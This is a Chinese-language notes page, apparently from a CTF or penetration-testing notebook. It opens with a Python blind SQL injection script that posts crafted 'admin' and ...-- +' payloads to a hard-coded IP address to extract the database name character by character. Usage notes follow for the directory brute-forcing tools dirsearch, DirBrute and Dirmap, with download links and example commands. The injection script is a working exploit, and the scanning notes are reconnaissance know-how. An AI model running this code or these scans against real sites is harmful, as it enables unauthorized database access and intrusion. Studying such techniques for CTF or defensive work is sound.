爆破
import string
import requests
url = "http://81.70.245.6:50366/index.php"
print (string.printable)
for i in range(100):
data = {
"username":"admin' and length((select database() ))=" + str(i) + "-- +"
}
r2 = requests.post(url, data=data)
if "hello" in r2.text:
length = i
print ("length:",i)
break
d = ""
for j in range(1, length + 1):
dic = "0123456789abcdefghijklmnopqrstuvwxyz,-./:;<=>?@[\]^_`{|}~"
for i in dic:
data = {
"username":"admin' and substr(((select database())),"+str(j)+",1)='" + str(i) + "' -- +"
}
#print (data)
r = requests.post(url, data = data)
# print (r.text)
if 'hello' in r.text:
d += str(i)
print (i)
print (d)目录爆破
(工具 御剑,dirb ,dirsearch等)端口扫描 (namp 等)
Dirsearch
下载地址
https://github.com/maurosoria/dirsearch
使用说明
python3 dirsearch.py -u 10.0.3.45 -e php
-u 指定url
-e 指定网站语言
-w 可以加上自己的字典(带上路径)
-r 递归跑(查到一个目录后,在目录后在重复跑,很慢,不建议用)
--random-agents 使用代理(使用的代理目录在uesr-agents.txt中,可以自己添加)
db目录是此款工具自带的字典
reports目录是你所有爬过的网站DirBrute
多线程WEB目录爆破工具(含字典)
Multi-thread WEB directory blasting tool(with dics inside)
可自定义线程,探测WAF,加载本地字典
下载地址
https://github.com/Xyntax/DirBrute
使用说明
Usage: dirbrute.py target [options]
Example: python dirbrute.py www.cdxy.me -e php -t 10
python dirbrute.py www.cdxy.me -t 10 -d ./dics/ASP/uniq
Options:
-h, --help show this help message and exit
-e EXT, --ext=EXT Choose the extension: php asp aspx jsp...
-t THREADS_NUM, --threads=THREADS_NUM
Number of threads. default = 10
-d DIC_PATH, --dic=DIC_PATH
Default dictionaty: ./dics/dirs.txtDirmap
一款高级Web目录文件扫描工具
下载地址
https://codeload.github.com/H4ckForJob/dirmap/zip/master
使用说明
$ git clone https://github.com/H4ckForJob/dirmap.git && cd dirmap && python3 -m pip install -r requirement.txt
$ python3 dirmap.py -iU https://site.com -lcf
$ python3 dirmap.py -iF urls.txt -lcf